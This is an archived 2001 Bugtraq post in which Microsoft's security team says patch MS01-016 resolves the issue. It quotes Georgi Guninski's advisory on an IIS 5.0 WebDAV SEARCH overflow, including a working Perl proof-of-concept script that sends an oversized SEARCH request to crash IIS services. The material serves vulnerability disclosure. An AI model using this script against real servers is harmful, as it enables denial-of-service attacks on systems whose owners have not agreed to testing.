[19695] in bugtraq
Re: IIS 5.0 SEARCH method overflow
daemon@ATHENA.MIT.EDU (Microsoft Security Response Center)
Mon Mar 19 14:44:38 2001
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Message-ID: <C10F7F33B880B248BCC47DB446738847023FF1E5@red-msg-07.redmond.corp.microsoft.com>
Date: Fri, 16 Mar 2001 19:18:54 -0800
Reply-To: Microsoft Security Response Center <secure@MICROSOFT.COM>
From: Microsoft Security Response Center <secure@MICROSOFT.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
-----BEGIN PGP SIGNED MESSAGE-----
The patch released for Microsoft Security Bulletin MS01-016 resolves
this issue.
Regards,
Secure@Microsoft.com
- -----Original Message-----
From: Georgi Guninski [mailto:guninski@GUNINSKI.COM]
Sent: Friday, March 16, 2001 12:09 PM
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: IIS 5.0 SEARCH method overflow
Georgi Guninski security advisory #39, 2001
IIS 5.0 SEARCH method overflow
Systems affected:
IIS 5.0
Risk: Unknown, may be very serious
Date: 16 March 2001
Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski. You may
distribute it unmodified. You may not modify it and distribute it or
distribute parts of it without the author's written permission.
Disclaimer:
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies, especially
the fact that Georgi Guninski is not liable for any damages caused by
direct or indirect use of the information or functionality provided
by this advisory or program. Georgi Guninski bears no responsibility
for content or misuse of this advisory or program or any derivatives
thereof.
Description:
This may be a duplicate of my advisory #38 -
http://www.guninski.com/iispropover.html
sorry if this is the case.
Microsoft did not answer my question whether it is the same issue. By
sending valid (not malformed :) ) but long SEARCH request to IIS 5.0
it is possible to restart all IIS related services.
The interesting point is the stack seems to be smashed and I believe
this may lead to executing arbitrary code though I have not achieved
it.
Details:
- --vv6.pl-------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n";
if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; } $port = @ARGV[1];
$host = @ARGV[0]; sub vv() { $ll=$_[0]; #length of buffer $ch=$_[1];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort =>
$port,Proto => "TCP") || return; $over=$ch x $ll; #string to overflow
$xml='<?xml version="1.0"?><D:searchrequest
xmlns:D="DAV:"><D:sql>SELECT DAV:displayname from
SCOPE("'.$over.'")</D:sql></D:searchrequest>'."\n";
$l=length($xml);
$req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost:
$host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,3000);
print "r=".$res;
close $socket;
}
do vv(126000,"V");
sleep(1);
do vv(126000,"V");
#Try 125000 - 128000
- ---------------------------------------------------------------
Workaround: some of the revisions of MS01-16 solves this issue, yet I
do not recommend using IIS in production environment.
Vendor status:
Microsoft was informed on 11 March 2001
Regards,
Georgi Guninski
http://www.guninski.com
-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.3
iQEVAwUBOrLXnY0ZSRQxA/UrAQGtAAf/fEOa0d0pkHpELUEGhc6B/O1/X+vnEDGS
ghWJ3KWHjQfeoZVwBav9nRkJXqxY+BEuIts1RoYl2lwNftFKGuxudIj23tYLJ/a7
gWrImwYyImdB1AEJhTSJ/ImNiNrN9EnWvuBF4eBiKQVh2NbNdiiwSlLEVP3IK5WS
UFlUbbq+LXjb++J6CZjYFxIbRung1jIOk8V+3yH0CpvVWjX8uFfeZnJs7aArqtm6
6Oaglal4z4TmopDL5j6a+OplLKhKIWLQ85w8NWpA6bwOw2O69XdzLrYYi4eoI0md
rRHKSlJOmEk9PVeZDrLZuSqA8fUzjH+1yVUTsHuNoSmQokIv4/GCmw==
=xRhW
-----END PGP SIGNATURE-----
